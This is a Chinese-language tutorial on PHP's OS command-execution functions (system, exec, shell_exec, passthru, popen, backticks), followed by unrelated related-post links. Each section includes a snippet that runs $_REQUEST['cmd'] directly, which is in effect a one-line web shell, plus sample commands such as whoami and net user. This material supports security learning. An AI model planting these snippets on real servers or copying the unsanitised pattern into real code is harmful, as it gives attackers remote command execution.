PHP 危险函数1-OS 命令执行函数

OS 命令执行函数

system 函数

  • 特点:

    • 自带输出功能
    • 自动区分系统平台,只需得知目标系统在 system() 中输入对应系统的命令即可
  • 使用

    php 复制代码
    <?php
    	system("<系统命令>");  
    ?>

    php 复制代码
    <pre>
    <?php
    	system("ipconfig");  
    ?>
  • 动态执行命令

    php 复制代码
    <pre>
    <?php
    	$cmd = $_REQUEST['cmd'];
    	system($cmd);  
    ?>

exec 函数

  • 特点:

    • 不自带输出,需要手动输出
    • 只能输出命令执行的最后一行,几乎没有回显
  • 使用

    php 复制代码
    <?php
    	exec("<系统命令>");  
    	// 输出需手动
    ?>
  • php 复制代码
    <?php
    	exec("ipconfig");  
    	// 输出需手动
    ?>

    不自动回显,但执行

  • 回显(只有最后一行)

    php 复制代码
    <?php
    	echo exec("ipconfig");  
    ?>
  • 动态执行命令

    php 复制代码
    <?php
    	$cmd=$_REQUEST['cmd'];
    	echo exec($cmd);
        ?>

shell_exec 函数

  • 需要手动输出命令执行结果。

  • 使用

    php 复制代码
    <?php
    	shell_exec("<命令>");
        ?>
  • 示例

    php 复制代码
    <?php
    	$cmd=$_REQUEST['cmd'];
    	echo shell_exec($cmd);
        ?>

passthru 函数

  • 自带输出功能。

    php 复制代码
    <?php
        passthru("<命令>");
        ?>
  • php 复制代码
    <?php
        passthru("net user");
        ?>
  • 动态执行

    php 复制代码
    <?php
    	$cmd=$_REQUEST['cmd'];
    	echo passthru($cmd);
        ?>

popen 函数

  • 在 PHP 中,popen() 函数用于打开一个管道,并返回一个指向该管道的文件指针。允许在 PHP 脚本中执行外部命令或程序,并与其进行交互。

  • 注意,两个参数

    php 复制代码
    <?php
    	popen(<命令>,"r");  // read,以读取的方式打开
    ?>
  • 示例

    php 复制代码
    <?php
    	$cmd = $_REQUEST['cmd'];
    	$result = popen($cmd, 'r');
    	echo fread($result, 1024);
    	// fread() 函数从管道中读取最多 1024 字节的输出
        ?>

反引号

  • 反引号````````内的字符串,会被解析成OS 命令。

  • 不自动输出

  • 使用

    php 复制代码
    <?php
        `<命令>`;
    ?>
  • 示例

    php 复制代码
    <?php
        echo `whoami`;
    ?>
  • 动态执行

    php 复制代码
    <pre>
    <?php
    	$cmd=$_REQUEST['cmd'];
    	echo `$cmd`;
        ?>
相关推荐
小猿姐2 小时前
唯品会大规模数据库云原生实践:基于 KubeBlocks 管理数千实例的统一运维之路
运维·elasticsearch·云原生
石山岭13 小时前
自己动手写了一个 Android 虚拟定位 App:GPSSimulate 技术实
android·前端
SkyWalking中文站15 小时前
认识 Horizon UI · 5/17:3D 基础设施地图
运维·监控·自动化运维
杉氧16 小时前
副作用 (Side Effects) 全攻略:如何像大师一样掌控 Composable 的生命周期?
android·架构·android jetpack
Kapaseker20 小时前
Kotlin Toolchain 0.11 发布:主要是把 Amper 干没了
android·kotlin
三少爷的鞋21 小时前
Android 现代架构不需要事件总线进阶篇
android
杉氧1 天前
深入理解 Compose 重组机制:快照系统如何驱动 UI 精准刷新?
android·架构·android jetpack
召钱熏1 天前
状态枚举正确≠渲染正确:一个语音按钮的状态机边界修复实录
android·前端
SkyWalking中文站1 天前
认识 Horizon UI · 1/17:SkyWalking 新一代可观测性控制台
运维·前端·监控
杉氧2 天前
深度解析:Jetpack Compose 核心架构与底层原理 —— 十年安卓老兵的“破茧重生”
android·架构·android jetpack